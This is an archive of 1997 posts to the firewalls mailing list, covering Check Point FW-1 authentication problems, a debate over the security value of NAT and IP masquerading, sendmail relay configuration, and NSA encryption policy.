10:55:31 -0800 To: firewalls@GreatCircle.COM Path: cichlid From: david.bolger@entropy.ie Newsgroups: mail.firewalls Subject: None Date: 3 Jan 1997 10:55:29 -0800 Lines: 75 Message-ID: <5ajkn1$3v7@cichlid.cichlid.com> NNTP-Posting-Host: cichlid.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <3a94b87696c81a61@deliver.cichlid.com> Lines: 65 Xdeliver: processed on Fri Jan 3 10:55:20 PST 1997 Xdeliver: SENDER owner-fw-1-mailinglist@us.checkpoint.com Xdeliver: to Xdeliver: cc Xdeliver: apparent_to Xdeliver: from david.bolger@entropy.ie X400-Received: by mta EntropyMHS in /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000 X400-Received: by /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000 Date: 03 Jan 97 17:07:09 +0000 Delivery-Date: 03 Jan 97 17:07:09 +0000 Message-Type: Multiple Part X400-Originator: David.D.B.Bolger@x400.entropy.ie X400-MTS-Identifier: [/PRMD=Entropy/ADMD=ENT/C=ie;ISOCOR-32a9d5a9-entropymhs] X400-Recipients: owner-fw-1-mailinglist@us.checkpoint.com X400-Recipients: fw-1-mailinglist@us.checkpoint.com X400-Recipients: andy@hpsx1.indo.hp.com Original-Encoded-Information-Types: IA5-Text X400-Content-Type: P2-1984 Message-ID: Importance: normal Subject: RE: user authentication on FW-1 2.1 Autoforwarded: FALSE To: owner-fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested) To: fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested) CC: andy@hpsx1.indo.hp.com (Non Receipt Notification Requested) In-Reply-To: <0103084952-user authentication on FW-1 2.1* @MHS> Conversion: Allowed Conversion-With-Loss: Allowed Alternate-Recipient: Prohibited Content-Identifier: RE: user authen Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7Bit Sender: owner-fw-1-mailinglist@us.checkpoint.com Precedence: bulk Hi folks, I've been having the same problems with FW-1 ver 2.1c on NT ver 3.51. Everything works fine except for User or Client Authentication, with same errors. Internal and OSPassword were turned on in the Object FireWall, and everything else looks fine. However it isn't working. I've got it to work on a test box once, but when I made other changes, it no longer works. I've also got it to work on a version 2.1a, but its flaky. If any body can shed some light, I'd appreciate it, regards, dave ---- owner-fw-1-mailinglist(a)us.checkpoint.com's Message ---- Hello everybody. I have some problems with FW-1 2.1 user authentication or client authentication. I've installed the FW-1 2.1 without any problems on Windows NT 3.51 and HP9000/ 712 running HP-UX 10.01, except for the user and client authentications. Several user auth methods have been tried, e.g. using Internal FW-1 password or the OS password but none worked. I've always got the following error message: ".... does not support Internal password" or ".... does not support Unix password". Does anybody experience this kind of problem before? Or did I miss something here? Any hints would be highly appreciated. Thanks a lot in advance for the help. Best regards Heri From firewalls-owner Fri Jan 3 12:48:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA17568 for firewalls-outgoing; Fri, 3 Jan 1997 11:24:28 -0800 (PST) Received: from ns1.ntshop.com ([207.91.166.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA17513 for ; Fri, 3 Jan 1997 11:24:03 -0800 (PST) Received: from beast.ntshop.net ([207.91.166.3]) by ns1.ntshop.com (post.office MTA v2.0 0813 ID# 153-13296) with SMTP id AAA91 for ; Fri, 3 Jan 1997 13:24:15 -0600 Received: by beast.ntshop.net with Microsoft Mail id <01BBF979.4FDC0940@beast.ntshop.net>; Fri, 3 Jan 1997 13:23:30 -0600 Message-ID: <01BBF979.4FDC0940@beast.ntshop.net> From: Mark Joseph Edwards To: "'firewalls@greatcircle.com'" Subject: RE: NT NAT Date: Fri, 3 Jan 1997 13:23:29 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Russ wrote - ----------------------- [snip] You got anything intelligent to say on just why you think NAT = offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN = THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP = FUNNEL NETWORK DIAGRAM.=20 [snip] ----------------------- Russ, my post wasn't about the validity of a NAT for use in security = implementations. You missed my point entirely. Let me clarify a bit -- = since you're interpreting what you see on their site in your own unique = way, you seem to have overlooked one important thing:=20 THEY HAVE A FIREWALL PRODUCT FOR SALE TOO. DO YOU THINK THEY'D BE SO = BLATANT AS TO IMPLY THAT THEIR NAT IS ALL YOU NEED WHEN THEY HAVE A = MISSING PIECE OF THE SECURITY PUZZLE FOR SALE ON THE SAME WEB SITE?=20 The picture you flamed them over is obviously intended by them to show = how the product fits into network topology -- not to show how to secure = a network entirely. Now we'll all go through 10,000 posts debating the NAT. Great. I can't = wait.... MJE From firewalls-owner Fri Jan 3 12:48:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA18935 for firewalls-outgoing; Fri, 3 Jan 1997 11:38:04 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA18913 for ; Fri, 3 Jan 1997 11:37:51 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id OAA01156; Fri, 3 Jan 1997 14:37:09 -0500 Date: Fri, 3 Jan 1997 14:37:09 -0500 (EST) From: Todd Graham Lewis To: Russ cc: Firewalls Mailing List Subject: RE: NT NAT In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A2@mail.rc.on.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 2 Jan 1997, Russ wrote: > Their network diagram describing how the system would be placed has it > behind a router and in front of the internal LAN. So now someone would > seem to think that it is highly desirable to dedicate an NT Workstation > to the task of NAT-only. Me thinks you could probably get a new router > that supports NAT for less money. I sincerely agree. A much better choice would have been a 386 running a non-bloated OS w/ IP Masquerade. There was a description of just such a setup in this month's SysAdmin magazine for anyone interested. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Fri Jan 3 12:52:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20954 for firewalls-outgoing; Fri, 3 Jan 1997 11:57:24 -0800 (PST) Received: from kcpgw2.kcp.com (kcpgw2.kcp.com [198.62.69.67]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA20883 for ; Fri, 3 Jan 1997 11:57:01 -0800 (PST) From: dharris@kcp.com Message-Id: <199701031957.LAA20883@miles.greatcircle.com> Received: by kcpgw2.kcp.com id AA15413 (InterLock SMTP Gateway 3.0 for firewalls@GreatCircle.COM); Fri, 3 Jan 1997 13:56:09 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-2); Fri, 3 Jan 1997 13:56:09 -0600 Received: by kcpgw2.kcp.com (Internal Mail Agent-1); Fri, 3 Jan 1997 13:56:09 -0600 Mime-Version: 1.0 Date: Fri, 3 Jan 1997 13:46:49 -0600 Subject: Re[2]: NT NAT To: "'Firewalls Mailing List'" , Carl Karlsson Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Added security? Only that extra security provided by not having your network's addresses known to the 'net. The NAT provides no extra protection from someone "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your actual addresses. It also provides no activity logging for later audit, at least not as part of the NAT function. Is it better than nothing? Arguably, yes, because it is an extra layer between your network and the 'net. Is it dangerous? Yes, especially if you think you are protected against attack because you have a NAT. Oops, I suppose I have just contradicted Russ. I think I just said that a NAT does provide some small measure of security. I guess I would put a NAT somewhere way below a screen router in the hierarchy of "firewalls", but I would definitely include it as part of the arsenal of a scapegoat. (Q: If the person who runs the web site is the webmaster, the one who runs a postoffice is a postmaster, what is the person who runs the firewall between two networks? A: You call her or him the scapegoat.) ______________________________ Reply Separator _________________________________ Subject: RE: NT NAT Author: Carl Karlsson at INTERNET-MAIL Date: 1/3/97 5:43 PM On Fri, 3 Jan 1997, Russ wrote: > You got anything intelligent to say on just why you think NAT offers ANY > SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security from just connecting the network straight out? Or am I missing something here (not unusual :)? I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x-addresses inside, I would be at least a little bit more secure than if had all my w95/nt/unix machines directly connected to the internet? (Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...) Calle From firewalls-owner Fri Jan 3 13:52:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA26078 for firewalls-outgoing; Fri, 3 Jan 1997 12:54:10 -0800 (PST) Received: from vespa.unix-ag.uni-siegen.de (vespa.unix-ag.uni-siegen.de [141.99.208.50]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA26046 for ; Fri, 3 Jan 1997 12:53:41 -0800 (PST) Received: from privatehost (sfx@isdn34.hrz.uni-siegen.de [141.99.174.34]) by vespa.unix-ag.uni-siegen.de (8.8.4/8.8.4/sfx-3.0) with ESMTP id VAA14243 for ; Fri, 3 Jan 1997 21:51:53 +0100 (MET) To: "firewalls" In-Reply-To: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr> From: "Lars Eilebrecht" Date: Fri, 03 Jan 1997 14:30:03 +0200 X-Mailer: IntuiNews 1.4 (28.6.96) Subject: Re: sendmail 8.8.4 with firewall Message-ID: <43789509.sfx@shadowbase.unix-ag.uni-siegen.de> Organization: Unix workgroup at the University of Siegen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mario Misic wrote: > I am running sendmail-8.8.4 on AIX-3.2.5. > > My problem is how to configure sendmail-8.8.4 to send mail over my firewall > server ! > I configure sendmail.cf like they said in README file but .......... ? But _how_ have you configured it? What features are turned on? What errors do you get? If you have a DNS inside your domain which is not directly connected to the outside world you may use something like this in your .mc file: define(`SMART_HOST', smtp:your-firewall-host.doma.in) LOCAL_NET_CONFIG R$* < @ $* . > $* $#smtp $@ $2. $: $1 < @ $2. > $3 This will forward all mail to hosts inside your domain directly to the host (or its MX) and all other mail will be forwarded to your firewall host as defined by the SMART_HOST option. If you still have problems, try to turn of MX lookups for your firewall host by using 'smtp:[your-firewall-host.doma.in]'. If you have problems in receiving mail from your firewall system you may want to open the identd port on your firewall system (for local hosts) or recompile sendmail with 'IDENTPROTO*' turned off in 'conf.h'. And if all else fails, check your dns and read the sendmail README again. :) ciao... Lars -- _____ ____ __ /\___// __// / __ sfx@cyberspace.org \ \ / /_\ / /\_\ http://www.cyberspace.org/~sfx/ ___\ \/ __// \ \/_/ /____\/_/ /_/\ \ - The most useful program will be \_\ - continually improved until it is useless. From firewalls-owner Fri Jan 3 14:07:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA00305 for firewalls-outgoing; Fri, 3 Jan 1997 13:43:51 -0800 (PST) Received: from fileserver.wtwitc.com ([204.238.40.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA00270 for ; Fri, 3 Jan 1997 13:43:30 -0800 (PST) Received: by fileserver.wtwitc.com from localhost (router,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:18 Eastern Standard Time Received: by fileserver.wtwitc.com from zdwells (204.238.40.170::mail daemon; unverified,SLMAILNT V2.2); Fri, 03 Jan 1997 16:08:17 Eastern Standard Time From: "Zachary Wells" To: "Firewalls" Subject: Stopping/Starting FW-1 Date: Fri, 3 Jan 1997 16:08:28 -0500 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1160 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm using fw-1 ver 2.1c for NT. I'm looking for the command line to stop and start the firewall. In the docs it refers to a command fwstart and fwstop. Neither of these two commands exist on my server and fw start and fw stop don't work either. What is the proper command? -------------------------------------------------------- Zach Wells Internal Computing Business: zachw@wtwitc.com Personal: ZachW@mindspring.com http://www.wtwitc.com/ Wesson, Taylor, Wells & Associates ------------------ When you want to help people, you tell them the truth. When you want to help yourself, you tell them what they want to hear. -- Thomas Sowell -- -------------------------------------------------------- From firewalls-owner Fri Jan 3 15:12:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02160 for firewalls-outgoing; Fri, 3 Jan 1997 14:14:22 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA02110 for ; Fri, 3 Jan 1997 14:13:57 -0800 (PST) Received: by hidata.com; id AA14945; Fri, 3 Jan 97 14:13:20 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xmaa14941; Fri, 3 Jan 97 14:13:06 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF981.2FDE8430@oscntsrv.hidata.com>; Fri, 3 Jan 1997 14:19:53 -0800 Message-Id: From: "Stout, Bill" To: "'Henry W. Farkas'" Cc: "'Firewall List'" Subject: RE: Huh? I musta misread this! Date: Fri, 3 Jan 1997 14:19:51 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 03, 1997 1:11 PM, Henry W. Farkas[SMTP:hfarkas@ims.advantis.com] wrote: > You appear to be stating that, in the interests of protecting us against the > issues you deliniate above, we should support government control of: crypto, > virus protection, log-on authentication and key escrow. Whoops, that is the _OPPOSITE_ of what I was trying to get across. As firewallers we believe in the trusted/untrusted network design philosophy, and a government most definitely fits in the untrusted catagory. Therefore: o I do not support government control of crypto. o I do not support government control of virus protection. o I do not support government control of logon authentication. o I do not support government control of Key escrow. I actually am greatful for the presence of non-malicious hackers who have exposed (otherwise they'd still be present) security holes. Verbosity follows (mouth in foot habit): The compeditive culture I left in Los Angeles had a school of thought which went like this: 'Life is a race with the next guy, if there's something you can do to impede him to win, do it'. The culture in Silicon Valley is more like this: 'Life is like climbing a mountain, if people help each other, you can get much further than when alone'. NSAs policy on encryption is like the race with the next guy. If they allowed the private sector to work on encryption, the NSA could reap from the development and add to it for their own security. But then again they are in the Spy business and in a way are against security for those they might want to attack. Bill Stout From firewalls-owner Fri Jan 3 16:13:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA13951 for firewalls-outgoing; Fri, 3 Jan 1997 15:44:36 -0800 (PST) Received: from pnw.opensys.com (PNW.PNW.OPENSYS.COM [198.202.150.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA13897 for ; Fri, 3 Jan 1997 15:44:08 -0800 (PST) Received: from medina-qe0.opensys.com (medina.opensys.com [198.202.150.3]) by pnw.opensys.com (8.8.4/8.8.4) with SMTP id PAA15990; Fri, 3 Jan 1997 15:50:11 -0800 (PST) Received: from pnw2.opensys.com by medina-qe0.opensys.com via smtpd (for pnw.opensys.com [198.202.150.1]) with SMTP; 3 Jan 1997 23:43:55 UT Received: from unknown (woody [198.202.150.44]) by pnw2.opensys.com (8.8.4/8.8.4) with SMTP id PAA14225; Fri, 3 Jan 1997 15:43:43 -0800 (PST) Message-ID: In-Reply-To: <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> References: Conversation <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> with last message <19970103160818.5c2ae4c9.in@fileserver.wtwitc.com> X-MSMail-Priority: Normal X-Priority: 3 To: "Zachary Wells" , "Firewalls" MIME-Version: 1.0 From: "Chris Plunkett" Subject: Re: Stopping/Starting FW-1 Date: Fri, 03 Jan 97 15:41:19 PST Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The services applet in the windows control panel should list the firewall service, simply highlight it and press stop. ---------- > I'm using fw-1 ver 2.1c for NT. I'm looking for the command > line to stop and start the firewall. In the docs it refers > to a command fwstart and fwstop. Neither of these two > commands exist on my server and fw start and fw stop don't > work either. What is the proper command? > > -------------------------------------------------------- > Zach Wells > Internal Computing > Business: zachw@wtwitc.com > Personal: ZachW@mindspring.com > http://www.wtwitc.com/ > Wesson, Taylor, Wells & Associates > ------------------ > When you want to help people, > you tell them the truth. > When you want to help yourself, > you tell them what they want to hear. > -- Thomas Sowell -- > -------------------------------------------------------- From firewalls-owner Fri Jan 3 17:20:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA19928 for firewalls-outgoing; Fri, 3 Jan 1997 17:09:24 -0800 (PST) Received: from tsunami.trouble.org (tsunami.trouble.org [206.14.193.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA19894 for ; Fri, 3 Jan 1997 17:09:12 -0800 (PST) Received: (from zen@localhost) by tsunami.trouble.org (5.3/5.3.2-gamma) id RAA17858 for firewalls@greatcircle.com; Fri, 3 Jan 1997 17:08:15 -0800 (PST) Message-Id: <199701040108.RAA17858@tsunami.trouble.org> From: zen@trouble.org (d) Date: Fri, 3 Jan 1997 17:08:14 -0800 X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: firewalls@greatcircle.com Subject: Internet security survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I completed an Internet security survey and wrote up a report about the rather appalling results; it can be seen at: http://www.trouble.org/survey Comments, critique, etc. welcome - -- dan farmer (I got some complaints about people not seeing my announcement the first time around (a couple of weeks ago); please pardon the duplicate notice.) From firewalls-owner Fri Jan 3 20:49:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA29106 for firewalls-outgoing; Fri, 3 Jan 1997 20:36:10 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA29082 for ; Fri, 3 Jan 1997 20:35:58 -0800 (PST) Message-Id: <199701040435.UAA29082@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA057492467; Sat, 4 Jan 1997 15:34:28 +1100 From: Darren Reed Subject: Re: NT NAT To: lists@reflections.mindspring.com (Todd Graham Lewis) Date: Sat, 4 Jan 1997 15:34:27 +1100 (EDT) Cc: Russ.Cooper@RC.on.ca, firewalls@GreatCircle.COM In-Reply-To: from "Todd Graham Lewis" at Jan 3, 97 02:37:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Todd Graham Lewis, sie said: > On Thu, 2 Jan 1997, Russ wrote: > > > Their network diagram describing how the system would be placed has it > > behind a router and in front of the internal LAN. So now someone would > > seem to think that it is highly desirable to dedicate an NT Workstation > > to the task of NAT-only. Me thinks you could probably get a new router > > that supports NAT for less money. > > I sincerely agree. A much better choice would have been a 386 running a > non-bloated OS w/ IP Masquerade. There was a description of just such a > setup in this month's SysAdmin magazine for anyone interested. IP Masquerading (and Linux is the only place it is called such) is NAT, so your "better choice" really isn't better at all. Whilst you could buy a PIX or some other router which does the same, they are only more secure in the sense that it isn't running a "normal" OS - it is still running IOS (or whatever it must) and that can still be "broken into" so the gain is minimal. NAT doesn't buy you "security", except for security by obscurity and a little more. If the NAT product works as they all should, it should _NOT_ be possible to target an internal machine without it having initiated an external communication first. The obscurity: the attacker doesn't have `direct' access to the internal hosts; the bit extra is if a host inside never requires the NAT, it never has an external IP#. Relying on NAT alone is dangerous, as so long the mapping exists, the host can be attacked. Darren p.s. in case you missed it, IP Masquerading is NOT more secure than NAT. From firewalls-owner Fri Jan 3 21:29:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01960 for firewalls-outgoing; Fri, 3 Jan 1997 21:24:24 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA01952 for ; Fri, 3 Jan 1997 21:24:08 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgOZt-0004FkC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 06:23:29 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sat, 4 Jan 97 06:23 MET Received: by lina id m0vgNIb-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sat, 4 Jan 1997 05:01:33 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Re[2]: NT NAT To: dharris@kcp.com Date: Sat, 4 Jan 1997 05:01:32 +0100 (MET) Cc: firewalls@GreatCircle.COM, ckn@findata.se In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com> from "dharris@kcp.com" at Jan 3, 97 01:46:49 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > Added security? Only that extra security provided by not having your network's > addresses known to the 'net. The NAT provides no extra protection from someone > "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your > actual addresses. It also provides no activity logging for later audit, at > least not as part of the NAT function. This is not quite true. NAT can protect you from outisde cause it only allows you to make connections from the inside to the outside. If you use Linux Masquerading for example there is no way to reach an listening port of the internal network from outside. This is sort of statefull connection filtering. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Sat Jan 4 00:59:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA11236 for firewalls-outgoing; Sat, 4 Jan 1997 00:41:25 -0800 (PST) Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA11229 for ; Sat, 4 Jan 1997 00:41:15 -0800 (PST) Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id JAA18973; Sat, 4 Jan 1997 09:40:51 +0100 Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id JAA17326 for ; Sat, 4 Jan 1997 09:40:47 +0100 Date: Sat, 4 Jan 1997 09:40:46 +0100 (MET) From: Carl Karlsson X-Sender: ckn@wintermute.marievik.findata.se To: "'Firewalls Mailing List'" Subject: Re: Re[2]: NT NAT In-Reply-To: <199701031957.LAA20883@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 3 Jan 1997 dharris@kcp.com wrote: > Added security? Only that extra security provided by not having your network's > addresses known to the 'net. The NAT provides no extra protection from someone > "outside" who knows or deduces (from unparsed E-mail headers, perhaps) your > actual addresses. It also provides no activity logging for later audit, at > least not as part of the NAT function. Please correct me if I'm wrong here but I was under the impression that the 192.168.x.x-addresses was 'non-routable' or whatever the term is. Under what circumstances can an external intruder gain access to my internal 192.168.x.x-machines? I'm not arguing that NAT is a great firewall, I'm just trying to understand what the risks are with masquerading 'illegal' addresses behind a machine that is 'secure enough'. And, sorry, just saying it's useless without any argument just isn't enough. :) Calle From firewalls-owner Sat Jan 4 08:01:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA20232 for firewalls-outgoing; Sat, 4 Jan 1997 07:44:35 -0800 (PST) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA20225 for ; Sat, 4 Jan 1997 07:44:25 -0800 (PST) Received: (qmail 12910 invoked from smtpd); 4 Jan 1997 15:44:01 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 4 Jan 1997 15:44:01 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA19436; Sat, 4 Jan 1997 09:44:00 -0600 Received: by sonic.nmti.com; id AA00908; Sat, 4 Jan 1997 09:43:55 -0600 From: peter@baileynm.com (Peter da Silva) Message-Id: <9701041543.AA00908@sonic.nmti.com.nmti.com> Subject: Re: Re[2]: NT NAT To: ckn@findata.se (Carl Karlsson) Date: Sat, 4 Jan 1997 09:43:54 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 4, 97 09:40:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Please correct me if I'm wrong here but I was under the impression that > the 192.168.x.x-addresses was 'non-routable' or whatever the term is. > Under what circumstances can an external intruder gain access to my > internal 192.168.x.x-machines? Source routed packets. From firewalls-owner Sat Jan 4 08:29:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA21385 for firewalls-outgoing; Sat, 4 Jan 1997 08:21:32 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA21359 for ; Sat, 4 Jan 1997 08:21:20 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id IAA20830; Sat, 4 Jan 1997 08:19:48 -0800 (PST) Message-Id: <3.0.32.19970104111733.006caf34@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 04 Jan 1997 11:17:37 -0500 To: peter@baileynm.com (Peter da Silva) From: Paul Ferguson Subject: Re: Re[2]: NT NAT Cc: ckn@findata.se (Carl Karlsson), firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:43 AM 1/4/97 -0600, Peter da Silva wrote: >> Please correct me if I'm wrong here but I was under the impression that >> the 192.168.x.x-addresses was 'non-routable' or whatever the term is. >> Under what circumstances can an external intruder gain access to my >> internal 192.168.x.x-machines? > >Source routed packets. > Which are easily stopped. - paul -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Jan 4 11:30:11 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA27275 for firewalls-outgoing; Sat, 4 Jan 1997 11:21:21 -0800 (PST) Received: from hotstar.net (hotstar.net [204.191.136.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA27268 for ; Sat, 4 Jan 1997 11:21:11 -0800 (PST) Received: from istar.ca (istar.ca [204.191.136.4]) by hotstar.net (8.7.3/8.7) with ESMTP id OAA17838; Sat, 4 Jan 1997 14:22:56 -0500 (EST) Received: from ts56-08.tor.iSTAR.ca (ts56-08.tor.iSTAR.ca [204.191.142.108]) by istar.ca (8.8.4/8.8.4) with SMTP id OAA11275; Sat, 4 Jan 1997 14:20:46 -0500 (EST) Received: by ts56-08.tor.iSTAR.ca with Microsoft Mail id <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca>; Sat, 4 Jan 1997 14:20:32 -0500 Message-ID: <01BBFA4A.7180A200@ts56-08.tor.iSTAR.ca> From: Gene Lee To: "'Henry W. Farkas'" , "'Stout, Bill'" Cc: "'Firewall List'" Subject: RE: Huh? I musta misread this! Date: Sat, 4 Jan 1997 14:20:30 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 03, 1997 5:19 PM, Stout, Bill[SMTP:bill.stout@hidata.com] wrote: >The compeditive culture I left in Los Angeles had a school of >thought which went like this: 'Life is a race with the next guy, >if there's something you can do to impede him to win, do it'. >The culture in Silicon Valley is more like this: 'Life is like >climbing a mountain, if people help each other, you can get much >further than when alone'. > >NSAs policy on encryption is like the race with the next guy. > >If they allowed the private sector to work on encryption, the NSA >could reap from the development and add to it for their own security. >But then again they are in the Spy business and in a way are against >security for those they might want to attack. That and the fact that it's generally thought that the NSA is light-years ahead of any other agency/organization in encyrption technology. No one can help them get further up the mountain, so they are simply interested in keeping everyone else as far down the mountain as possible... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner 